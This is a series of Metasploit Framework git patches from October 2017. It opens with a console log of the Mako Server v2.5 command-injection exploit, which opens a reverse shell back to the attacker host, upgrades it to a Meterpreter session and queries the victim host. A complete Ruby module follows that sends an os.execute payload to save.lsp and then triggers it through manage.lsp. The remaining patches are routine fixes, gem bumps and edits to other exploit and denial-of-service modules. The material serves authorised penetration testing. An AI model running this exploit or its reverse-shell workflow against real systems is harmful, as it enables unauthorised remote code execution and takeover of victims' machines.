PAYLOAD => cmd/windows/reverse_powershell + msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.4 + LHOST => 10.10.10.4 + msf exploit(makoserver_cmd_exec) > check + [*] 10.10.10.2:80 The target appears to be vulnerable. + msf exploit(makoserver_cmd_exec) > exploit + + [*] Started reverse TCP handler on 10.10.10.4:4444 + [*] Sending payload to target... + [*] Command shell session 1 opened (10.10.10.4:4444 -> 10.10.10.2:49189) at 2017-10-25 20:57:56 -0400 + + Microsoft Windows + Copyright (c) Microsoft Corporation. All rights reserved. + + C:\Users\Smith\Downloads\MakoServer>^Z + Background session 1? [y/N] y + msf exploit(makoserver_cmd_exec) > use multi/manage/shell_to_meterpreter + msf post(shell_to_meterpreter) > sessions -l + + Active sessions + =============== + + Id Name Type Information Connection + -- ---- ---- ----------- ---------- + 1 shell cmd/windows 10.10.10.4:4444 -> 10.10.10.2:49189 (10.10.10.2) + msf post(shell_to_meterpreter) > set SESSION 1 + SESSION => 1 + msf post(shell_to_meterpreter) > set LPORT 8080 + LPORT => 8080 + msf post(shell_to_meterpreter) > exploit + + [*] Upgrading session ID: 1 + [*] Starting exploit/multi/handler + [*] Started reverse TCP handler on 10.10.10.4:8080 + [-] Powershell is not installed on the target. + [*] Command stager progress: 1.66% (1699/102108 bytes) + ... + [*] Command stager progress: 100.00% (102108/102108 bytes) + [*] Post module execution completed + msf post(shell_to_meterpreter) > sessions -l + + Active sessions + =============== + + Id Name Type Information Connection + -- ---- ---- ----------- ---------- + 1 shell cmd/windows 10.10.10.4:4444 -> 10.10.10.2:49189 (10.10.10.2) + 2 meterpreter x86/windows smith-PC\smith @ SMITH-PC 10.10.10.4:8080 -> 10.10.10.2:49190 (10.10.10.2) + + msf post(shell_to_meterpreter) > sessions -i 2 + [*] Starting interaction with 2... + + meterpreter > getuid + Server username: smith-PC\smith + meterpreter > sysinfo + Computer : SMITH-PC + OS : Windows 7 (Build 7601, Service Pack 1). + Architecture : x64 + System Language : en_US + Domain : WORKGROUP + Logged On Users : 2 + Meterpreter : x86/windows + ``` diff --git a/modules/exploits/windows/http/makoserver_cmd_exec.rb b/modules/exploits/windows/http/makoserver_cmd_exec.rb new file mode 100644 index 0000000000..98d0e456ea --- /dev/null +++ b/modules/exploits/windows/http/makoserver_cmd_exec.rb @@ -0,0 +1,125 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Mako Server v2.5 OS Command Injection RCE', + 'Description' => %q{ + This module exploits a vulnerability found in Mako Server v2.5. + It's possible to inject arbitrary OS commands in the Mako Server + tutorial page through a PUT request to save.lsp. + + Attacker input will be saved on the victims machine and can + be executed by sending a GET request to manage.lsp. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'John Page (hyp3rlinx) - Beyond Security SecuriTeam Secure Disclosure', # Vulnerability discovery & PoC + 'Steven Patterson (Shogun Lab) ' # Metasploit module + ], + 'References' => + [ + ['EDB', '42683'], + ['URL', 'https://blogs.securiteam.com/index.php/archives/3391'] + ], + 'Arch' => ARCH_CMD, + 'Platform' => 'win', + 'Targets' => + [ + ['Mako Server v2.5 - Windows x86/x64', { }] + ], + 'DefaultTarget' => 0, + 'Privileged' => false, + 'DisclosureDate' => 'Sep 3 2017')) + + register_options( + [ + OptString.new('URI', [true, 'URI path to the Mako Server app', '/']) + ] + ) + end + + def check + vprint_status('Trying to detect running Mako Server and necessary files...') + + # Send GET request to determine existence of save.lsp page + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(datastore['URI'], 'examples/save.lsp') + }, 20) + + # If response does not include "MakoServer.net", target is not viable. + if res.headers['Server'] !~ /MakoServer.net/ + vprint_warning 'Target is not a Mako Server.' + return CheckCode::Safe + end + + if res.body + if res.body =~ /Incorrect usage/ + # We are able to determine that the server has a save.lsp page and + # returns the correct output. + vprint_status 'Mako Server save.lsp returns correct ouput.' + return CheckCode::Appears + else + # The page exists, but is not returning the expected output. + # May be a different version? + vprint_warning 'Mako Server save.lsp did not return expected output.' + return CheckCode::Detected + end + else + # The above checks failed and exploitability could not be determined. + vprint_error('Unable to determine exploitability, save.lsp not found.') + return CheckCode::Unknown + end + + return CheckCode::Safe + end + + def exploit + print_status('Sending payload to target...') + + # The double square brackets helps to ensure single/double quotes + # in cmd payload do not interfere with syntax of os.execute Lua function. + cmd = %{os.execute([[#{payload.encoded}]])} + + # If users want to troubleshoot their cmd payloads, they can see the + # Lua function with params that the module uses in a more verbose mode. + vprint_status("Now executing the following command: #{cmd}") + + # Send a PUT request to save.lsp with command payload + begin + vprint_status('Sending PUT request to save.lsp...') + send_request_cgi({ + 'method' => 'PUT', + 'uri' => normalize_uri(datastore['URI'], 'examples/save.lsp?ex=2.1'), + 'ctype' => 'text/plain', + 'data' => cmd, + 'http' => { + 'X-Requested-With' => 'XMLHttpRequest', + 'Referer' => 'http://localhost/Lua-Types.lsp' + } + }, 20) + rescue StandardError => e + fail_with(Failure::NoAccess, "Error: #{e}") + end + + # Send a GET request to manage.lsp with execute set to true + begin + vprint_status('Sending GET request to manage.lsp...') + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(datastore['URI'], 'examples/manage.lsp?execute=true&ex=2.1&type=lua') + }, 20) + rescue StandardError => e + fail_with(Failure::NoAccess, "Error: #{e}") + end + end +end From 85b59c87ca27c98b1d897b6f854ae86bc06a50e6 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Fri, 27 Oct 2017 02:15:08 -0700 Subject: [PATCH 056/254] fix buggy handling of partial ingress packet data If we have more data, and the packet parser needs more data, connect the two together rather than bailing. This fixes reverse_tcp_ssl along with probably a lot of other higher-latency corner cases. --- lib/msf/base/sessions/meterpreter.rb | 4 ++-- lib/rex/post/meterpreter/packet_parser.rb | 20 ++++++++------------ 2 files changed, 10 insertions(+), 14 deletions(-) diff --git a/lib/msf/base/sessions/meterpreter.rb b/lib/msf/base/sessions/meterpreter.rb index 110e1fef3d..3e13987fb1 100644 --- a/lib/msf/base/sessions/meterpreter.rb +++ b/lib/msf/base/sessions/meterpreter.rb @@ -147,9 +147,9 @@ class Meterpreter < Rex::Post::Meterpreter::Client guid = [SecureRandom.uuid.gsub(/-/, '')].pack('H*') session.core.set_session_guid(guid) session.session_guid = guid - # TODO: New statgeless session, do some account in the DB so we can track it later. + # TODO: New stageless session, do some account in the DB so we can track it later. else - # TODO: This session was either staged or previously known, and so we shold do some accounting here! + # TODO: This session was either staged or previously known, and so we should do some accounting here! end unless datastore['AutoLoadStdapi'] == false diff --git a/lib/rex/post/meterpreter/packet_parser.rb b/lib/rex/post/meterpreter/packet_parser.rb index 28bd1ef584..9aea233622 100644 --- a/lib/rex/post/meterpreter/packet_parser.rb +++ b/lib/rex/post/meterpreter/packet_parser.rb @@ -30,24 +30,20 @@ class PacketParser # Reads data from the wire and parse as much of the packet as possible. # def recv(sock) - bytes_left = self.packet.raw_bytes_required - - if bytes_left > 0 - raw = sock.read(bytes_left) - if raw + if self.packet.raw_bytes_required + while (raw = sock.read(self.packet.raw_bytes_required)) self.packet.add_raw(raw) - else - raise EOFError + break if self.packet.raw_bytes_required == 0 end end - if self.packet.raw_bytes_required == 0 - packet = self.packet - reset - return packet + if self.packet.raw_bytes_required > 0 + return nil end - nil + packet = self.packet + reset + packet end protected From d1889827606cc1f08bed6ce1367cafe41cd05e1b Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Fri, 27 Oct 2017 02:29:25 -0700 Subject: [PATCH 057/254] handle masked EOF from Rex sockets (TODO: kill that behavior) --- lib/rex/post/meterpreter/packet_parser.rb | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/lib/rex/post/meterpreter/packet_parser.rb b/lib/rex/post/meterpreter/packet_parser.rb index 9aea233622..ca646e39fd 100644 --- a/lib/rex/post/meterpreter/packet_parser.rb +++ b/lib/rex/post/meterpreter/packet_parser.rb @@ -27,10 +27,11 @@ class PacketParser end # - # Reads data from the wire and parse as much of the packet as possible. + # Reads data from the socket and parses as much of the packet as possible. # def recv(sock) - if self.packet.raw_bytes_required + raw = nil + if self.packet.raw_bytes_required > 0 while (raw = sock.read(self.packet.raw_bytes_required)) self.packet.add_raw(raw) break if self.packet.raw_bytes_required == 0 @@ -38,7 +39,11 @@ class PacketParser end if self.packet.raw_bytes_required > 0 - return nil + if raw == nil + raise EOFError + else + return nil + end end packet = self.packet From 037c58d1f66b2d9ed8235b392d1e6a988d3cc225 Mon Sep 17 00:00:00 2001 From: h00die Date: Fri, 27 Oct 2017 10:10:04 -0400 Subject: [PATCH 058/254] wp-mobile-detector udpates --- .../unix/webapp/wp_mobile_detector_upload_execute.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb b/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb index ae2f4fa7ad..1817767973 100644 --- a/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb +++ b/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb @@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote 'method' => 'GET', 'uri' => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache') + '/' ) - if res and !res.body.include?(payload_name) + if res && !res.body.include?(payload_name) vprint_status("#{payload_name} verified as not written.") else fail_with(Failure::BadConfig,"#{payload_name} already written on system.") @@ -95,7 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote print_good('Sleeping 5 seconds for payload upload') register_files_for_cleanup(payload_name) - select(nil,nil,nil,5) + Rex.sleep(5) print_status("Executing the payload via #{normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache', payload_name)}") send_request_cgi( @@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote 'uri' => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache', payload_name), }) # wait for callback, without this we exit too fast and miss our shell - select(nil,nil,nil,2) + Rex.sleep(2) handler else if res.nil? From 587c9673c67014badf578bb47dfe7fb6e228cf13 Mon Sep 17 00:00:00 2001 From: sho-luv Date: Fri, 27 Oct 2017 09:34:49 -0700 Subject: [PATCH 059/254] Added host and port to output I added the host and port number to reporting when instances are found. --- modules/auxiliary/scanner/http/jenkins_enum.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/jenkins_enum.rb b/modules/auxiliary/scanner/http/jenkins_enum.rb index 953c0ca9c6..982adf452e 100644 --- a/modules/auxiliary/scanner/http/jenkins_enum.rb +++ b/modules/auxiliary/scanner/http/jenkins_enum.rb @@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary end version = res.headers['X-Jenkins'] - print_good("Jenkins Version - #{version}") + print_good("#{rhost}:#{rport} Jenkins Version - #{version}") report_service( :host => rhost, :port => rport, From 254c2a33d366dc6070845d65e9179c8b99f9895e Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Fri, 27 Oct 2017 11:44:23 -0500 Subject: [PATCH 060/254] bump metasploit payloads, windows meterpreter fixes --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 69ab329926..d69ad8ecd9 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -17,7 +17,7 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.3.11) + metasploit-payloads (= 1.3.13) metasploit_data_models metasploit_payloads-mettle (= 0.2.2) msgpack @@ -178,7 +178,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-payloads (1.3.11) + metasploit-payloads (1.3.13) metasploit_data_models (2.0.15) activerecord (~> 4.2.6) activesupport (~> 4.2.6) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 7bf217c2c3..46f5fcb14e 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.3.11' + spec.add_runtime_dependency 'metasploit-payloads', '1.3.13' # Needed for the next-generation POSIX Meterpreter spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.2' # Needed by msfgui and other rpc components From 140955f2208560b466355aacb8151618a028093c Mon Sep 17 00:00:00 2001 From: Metasploit Date: Fri, 27 Oct 2017 10:03:00 -0700 Subject: [PATCH 061/254] Bump version of framework to 4.16.14 --- Gemfile.lock | 18 +++++++++--------- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 10 insertions(+), 10 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index d69ad8ecd9..d1f3a823bf 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.16.13) + metasploit-framework (4.16.14) actionpack (~> 4.2.6) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -117,10 +117,10 @@ GEM dnsruby (1.60.2) docile (1.1.5) erubis (2.7.0) - factory_girl (4.8.1) + factory_girl (4.9.0) activesupport (>= 3.0.0) - factory_girl_rails (4.8.0) - factory_girl (~> 4.8.0) + factory_girl_rails (4.9.0) + factory_girl (~> 4.9.0) railties (>= 3.0.0) faraday (0.13.1) multipart-post (>= 1.2, < 3) @@ -138,7 +138,7 @@ GEM multi_json (~> 1.11) os (~> 0.9) signet (~> 0.7) - grpc (1.6.7) + grpc (1.7.0) google-protobuf (~> 3.1) googleapis-common-protos-types (~> 1.0.0) googleauth (~> 0.5.1) @@ -243,13 +243,13 @@ GEM activesupport (= 4.2.10) rake (>= 0.8.7) thor (>= 0.18.1, < 2.0) - rake (12.1.0) + rake (12.2.1) rb-readline (0.5.5) rbnacl (4.0.2) ffi rbnacl-libsodium (1.0.13) rbnacl (>= 3.0.1) - recog (2.1.15) + recog (2.1.16) nokogiri redcarpet (3.4.0) rex-arch (0.1.11) @@ -348,9 +348,9 @@ GEM thread_safe (0.3.6) timecop (0.9.1) ttfunk (1.5.1) - tzinfo (1.2.3) + tzinfo (1.2.4) thread_safe (~> 0.1) - tzinfo-data (1.2017.2) + tzinfo-data (1.2017.3) tzinfo (>= 1.0.0) windows_error (0.1.2) xdr (2.0.0) diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index c111856d17..9690195ec5 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.16.13" + VERSION = "4.16.14" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From 73c9807c55188f29ef7757f62bb3ca355e0d7ed3 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 25 Oct 2017 14:45:47 -0500 Subject: [PATCH 062/254] Add module support for sessions -s --- lib/msf/ui/console/command_dispatcher/core.rb | 30 ++++++++----------- 1 file changed, 12 insertions(+), 18 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 675538ae61..6c4e796224 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -47,7 +47,7 @@ class Core "-q" => [ false, "Quiet mode" ], "-k" => [ true, "Terminate sessions by session ID and/or range" ], "-K" => [ false, "Terminate all sessions" ], - "-s" => [ true, "Run a script on the session given with -i, or all" ], + "-s" => [ true, "Run a script or module on the session given with -i, or all" ], "-r" => [ false, "Reset the ring buffer for the session given with -i, or all" ], "-u" => [ true, "Upgrade a shell to a meterpreter session on many platforms" ], "-t" => [ true, "Set a response timeout (default: 15)" ], @@ -1180,10 +1180,10 @@ class Core sid = val || false when "-K" method = 'killall' - # Run a script on all meterpreter sessions + # Run a script or module on specified sessions when "-s" unless script - method = 'scriptall' + method = 'script' script = val end # Upload and exec to the specific command session @@ -1389,15 +1389,11 @@ class Core sid = nil end end - when 'scriptall' + when 'script' unless script - print_error("No script specified!") + print_error("No script or module specified!") return false end - script_paths = {} - script_paths['meterpreter'] = Msf::Sessions::Meterpreter.find_script_path(script) - script_paths['shell'] = Msf::Sessions::CommandShell.find_script_path(script) - sessions = sid ? session_list : framework.sessions.keys.sort sessions.each do |sess_id| @@ -1413,15 +1409,13 @@ class Core session.response_timeout = response_timeout end begin - if script_paths[session.type] - print_status("Session #{sess_id} (#{session.session_host}):") - print_status("Running script #{script} on #{session.type} session" + - " #{sess_id} (#{session.session_host})") - begin - session.execute_file(script_paths[session.type], extra) - rescue ::Exception => e - log_error("Error executing script: #{e.class} #{e}") - end + print_status("Session #{sess_id} (#{session.session_host}):") + print_status("Running #{script} on #{session.type} session" + + " #{sess_id} (#{session.session_host})") + begin + session.execute_script(script, *extra) + rescue ::Exception => e + log_error("Error executing script or module: #{e.class} #{e}") end ensure if session.respond_to?(:response_timeout) && last_known_timeout From 9349e1eda532adfa6338c4de225329d17647dbaf Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 27 Oct 2017 11:11:29 -0500 Subject: [PATCH 063/254] Fix find_script_path to check only files --- lib/msf/base/sessions/scriptable.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/base/sessions/scriptable.rb b/lib/msf/base/sessions/scriptable.rb index d136f9a396..87a44c031f 100644 --- a/lib/msf/base/sessions/scriptable.rb +++ b/lib/msf/base/sessions/scriptable.rb @@ -27,7 +27,7 @@ module Scriptable # Scan all of the path combinations check_paths.each { |path| - if ::File.exist?(path) + if ::File.file?(path) full_path = path break end @@ -150,7 +150,7 @@ module Scriptable # session local_exploit_opts = local_exploit_opts.merge(opts) - new_session = mod.exploit_simple( + mod.exploit_simple( 'Payload' => local_exploit_opts.delete('payload'), 'Target' => local_exploit_opts.delete('target'), 'LocalInput' => self.user_input, From b96fa690a9d206d6a12ab722a1f37537169885b9 Mon Sep 17 00:00:00 2001 From: Steven Patterson Date: Fri, 27 Oct 2017 15:23:22 -0400 Subject: [PATCH 064/254] Add brackets to print functions --- modules/exploits/windows/http/makoserver_cmd_exec.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/http/makoserver_cmd_exec.rb b/modules/exploits/windows/http/makoserver_cmd_exec.rb index 98d0e456ea..5326d5bb7a 100644 --- a/modules/exploits/windows/http/makoserver_cmd_exec.rb +++ b/modules/exploits/windows/http/makoserver_cmd_exec.rb @@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote # If response does not include "MakoServer.net", target is not viable. if res.headers['Server'] !~ /MakoServer.net/ - vprint_warning 'Target is not a Mako Server.' + vprint_warning('Target is not a Mako Server.') return CheckCode::Safe end @@ -66,12 +66,12 @@ class MetasploitModule < Msf::Exploit::Remote if res.body =~ /Incorrect usage/ # We are able to determine that the server has a save.lsp page and # returns the correct output. - vprint_status 'Mako Server save.lsp returns correct ouput.' + vprint_status('Mako Server save.lsp returns correct ouput.') return CheckCode::Appears else # The page exists, but is not returning the expected output. # May be a different version? - vprint_warning 'Mako Server save.lsp did not return expected output.' + vprint_warning('Mako Server save.lsp did not return expected output.') return CheckCode::Detected end else From 9c16da9c985b2dbc627523466fb470d73bd9d72d Mon Sep 17 00:00:00 2001 From: RootUp Date: Sat, 28 Oct 2017 18:53:15 +0530 Subject: [PATCH 065/254] Update ibm_lotus_notes2.rb --- .../auxiliary/dos/http/ibm_lotus_notes2.rb | 24 +++++++++---------- 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/modules/auxiliary/dos/http/ibm_lotus_notes2.rb b/modules/auxiliary/dos/http/ibm_lotus_notes2.rb index 4513c9dfda..67df421cfd 100644 --- a/modules/auxiliary/dos/http/ibm_lotus_notes2.rb +++ b/modules/auxiliary/dos/http/ibm_lotus_notes2.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary super( update_info( info, - 'Name' => "IBM Notes encodeURI DOS", + 'Name' => "IBM Notes Denial Of Service", 'Description' => %q( This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes. If successful, the browser will crash after viewing the webpage. @@ -46,17 +46,17 @@ var i = 1; f.click(); setInterval("f.click()", 1); setInterval(function(){ - for (var k in kins) { - if (kins[k] && kins[k].status === undefined) { - kins[k].close(); - delete kins[k]; - } - } - w = open('data:text/html, From 3b8ef02c29da293e37cec0a9c58f577ff704026d Mon Sep 17 00:00:00 2001 From: h00die Date: Sun, 29 Oct 2017 08:36:05 -0400 Subject: [PATCH 066/254] sid vs side --- lib/msf/core/post/windows/priv.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/post/windows/priv.rb b/lib/msf/core/post/windows/priv.rb index 869e129261..084f9acec7 100644 --- a/lib/msf/core/post/windows/priv.rb +++ b/lib/msf/core/post/windows/priv.rb @@ -194,7 +194,7 @@ module Msf::Post::Windows::Priv # def is_high_integrity? il = get_integrity_level - (il == INTEGRITY_LEVEL_SID[:high] || il == INTEGRITY_LEVEL_SIDE[:system]) + (il == INTEGRITY_LEVEL_SID[:high] || il == INTEGRITY_LEVEL_SID[:system]) end # From 940573ad49f2bc98fb2f2b6e895148ef684e58ec Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Sun, 29 Oct 2017 15:57:33 -0400 Subject: [PATCH 067/254] Support ruby directives in Meterpreter rc scripts --- .../ui/console/command_dispatcher/resource.rb | 6 +- .../ui/console/command_dispatcher/core.rb | 78 ++++++++++++------- lib/rex/ui/text/dispatcher_shell.rb | 68 ++++++++++++++++ 3 files changed, 122 insertions(+), 30 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/resource.rb b/lib/msf/ui/console/command_dispatcher/resource.rb index b020bd743f..8f2e6277fd 100644 --- a/lib/msf/ui/console/command_dispatcher/resource.rb +++ b/lib/msf/ui/console/command_dispatcher/resource.rb @@ -59,8 +59,8 @@ module Msf elsif # let's check to see if it's in the scripts/resource dir (like when tab completed) [ - ::Msf::Config.script_directory + ::File::SEPARATOR + "resource", - ::Msf::Config.user_script_directory + ::File::SEPARATOR + "resource" + ::Msf::Config.script_directory + ::File::SEPARATOR + 'resource', + ::Msf::Config.user_script_directory + ::File::SEPARATOR + 'resource' ].each do |dir| res_path = dir + ::File::SEPARATOR + res if ::File.exist?(res_path) @@ -97,7 +97,7 @@ module Msf [ ::Msf::Config.script_directory + File::SEPARATOR + "resource", ::Msf::Config.user_script_directory + File::SEPARATOR + "resource", - "." + '.' ].each do |dir| next if not ::File.exist? dir tabs += ::Dir.new(dir).find_all { |e| diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index a9cafc2d71..5d854c6fd1 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb @@ -1530,49 +1530,73 @@ class Console::CommandDispatcher::Core end def cmd_resource_help - print_line('Usage: resource [path2 ...]') + print_line "Usage: resource path1 [path2 ...]" print_line - print_line('Run the commands stored in the supplied files.') + print_line "Run the commands stored in the supplied files (- for stdin)." + print_line "Resource files may also contain ERB or Ruby code between tags." print_line end def cmd_resource(*args) if args.empty? + cmd_resource_help return false end - args.each do |glob| - files = ::Dir.glob(::File.expand_path(glob)) - if files.empty? - print_error("No such file #{glob}") - next - end - files.each do |filename| - print_status("Reading #{filename}") - if (not ::File.readable?(filename)) - print_error("Could not read file #{filename}") - next - else - ::File.open(filename, 'r').each_line do |line| - next if line.strip.length < 1 - next if line[0,1] == '#' - begin - print_status("Running #{line}") - client.console.run_single(line) - rescue ::Exception => e - print_error("Error Running Command #{line}: #{e.class} #{e}") - end - + args.each do |res| + good_res = nil + if res == '-' + good_res = res + elsif ::File.exist?(res) + good_res = res + elsif + # let's check to see if it's in the scripts/resource dir (like when tab completed) + [ + ::Msf::Config.script_directory + ::File::SEPARATOR + 'resource' + ::File::SEPARATOR + 'meterpreter', + ::Msf::Config.user_script_directory + ::File::SEPARATOR + 'resource' + ::File::SEPARATOR + 'meterpreter' + ].each do |dir| + res_path = dir + ::File::SEPARATOR + res + if ::File.exist?(res_path) + good_res = res_path + break end end end + if good_res + client.console.load_resource(good_res) + else + print_error("#{res} is not a valid resource file") + next + end end end def cmd_resource_tabs(str, words) - return [] if words.length > 1 - - tab_complete_filenames(str, words) + tabs = [] + #return tabs if words.length > 1 + if ( str and str =~ /^#{Regexp.escape(::File::SEPARATOR)}/ ) + # then you are probably specifying a full path so let's just use normal file completion + return tab_complete_filenames(str,words) + elsif (not words[1] or not words[1].match(/^\//)) + # then let's start tab completion in the scripts/resource directories + begin + [ + ::Msf::Config.script_directory + ::File::SEPARATOR + 'resource' + ::File::SEPARATOR + 'meterpreter', + ::Msf::Config.user_script_directory + ::File::SEPARATOR + 'resource' + ::File::SEPARATOR + 'meterpreter', + '.' + ].each do |dir| + next if not ::File.exist? dir + tabs += ::Dir.new(dir).find_all { |e| + path = dir + ::File::SEPARATOR + e + ::File.file?(path) and ::File.readable?(path) + } + end + rescue Exception + end + else + tabs += tab_complete_filenames(str,words) + end + return tabs end def cmd_enable_unicode_encoding diff --git a/lib/rex/ui/text/dispatcher_shell.rb b/lib/rex/ui/text/dispatcher_shell.rb index 878010829c..a5f365671f 100644 --- a/lib/rex/ui/text/dispatcher_shell.rb +++ b/lib/rex/ui/text/dispatcher_shell.rb @@ -2,6 +2,7 @@ require 'rex/ui' require 'pp' require 'rex/text/table' +require 'erb' module Rex module Ui @@ -368,6 +369,73 @@ module DispatcherShell return items end + # Processes a resource script file for the console. + # + # @param path [String] Path to a resource file to run + # @return [void] + def load_resource(path) + if path == '-' + resource_file = $stdin.read + path = 'stdin' + elsif ::File.exist?(path) + resource_file = ::File.read(path) + else + print_error("Cannot find resource script: #{path}") + return + end + + # Process ERB directives first + print_status "Processing #{path} for ERB directives." + erb = ERB.new(resource_file) + processed_resource = erb.result(binding) + + lines = processed_resource.each_line.to_a + bindings = {} + while lines.length > 0 + + line = lines.shift + break if not line + line.strip! + next if line.length == 0 + next if line =~ /^#/ + + # Pretty soon, this is going to need an XML parser :) + # TODO: case matters for the tag and for binding names + if line =~ /|\s+)/ + bin = ($~[1] || $~[2]) + bindings[bin] = binding unless bindings.has_key? bin + bin = bindings[bin] + else + bin = binding + end + buff = '' + while lines.length > 0 + line = lines.shift + break if not line + break if line =~ /<\/ruby>/ + buff << line + end + if ! buff.empty? + session = client + framework = client.framework + + print_status("resource (#{path})> Ruby Code (#{buff.length} bytes)") + begin + eval(buff, bin) + rescue ::Interrupt + raise $! + rescue ::Exception => e + print_error("resource (#{path})> Ruby Error: #{e.class} #{e} #{e.backtrace}") + end + end + else + print_line("resource (#{path})> #{line}") + run_single(line) + end + end + end + # # Run a single command line. # From ebaf0c5484551b4cbd37f133ca7f44beceaa4e8b Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 30 Oct 2017 05:09:31 -0500 Subject: [PATCH 068/254] bump mettle, update toolchain, add e500v2 and reduce size of x86_64 --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index d1f3a823bf..e32cd33f32 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -19,7 +19,7 @@ PATH metasploit-model metasploit-payloads (= 1.3.13) metasploit_data_models - metasploit_payloads-mettle (= 0.2.2) + metasploit_payloads-mettle (= 0.2.5) msgpack nessus_rest net-ssh @@ -189,7 +189,7 @@ GEM postgres_ext railties (~> 4.2.6) recog (~> 2.0) - metasploit_payloads-mettle (0.2.2) + metasploit_payloads-mettle (0.2.5) method_source (0.9.0) mini_portile2 (2.3.0) minitest (5.10.3) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 46f5fcb14e..bb1923e736 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -72,7 +72,7 @@ Gem::Specification.new do |spec| # Needed for Meterpreter spec.add_runtime_dependency 'metasploit-payloads', '1.3.13' # Needed for the next-generation POSIX Meterpreter - spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.2' + spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.5' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. From 22f9626186508322a48681fcf7574ebbf74c7384 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 30 Oct 2017 05:26:29 -0500 Subject: [PATCH 069/254] update sizes --- .../payloads/singles/linux/aarch64/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/aarch64/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/armbe/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/armbe/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/armle/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/armle/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/mips64/meterpreter_reverse_http.rb | 2 +- 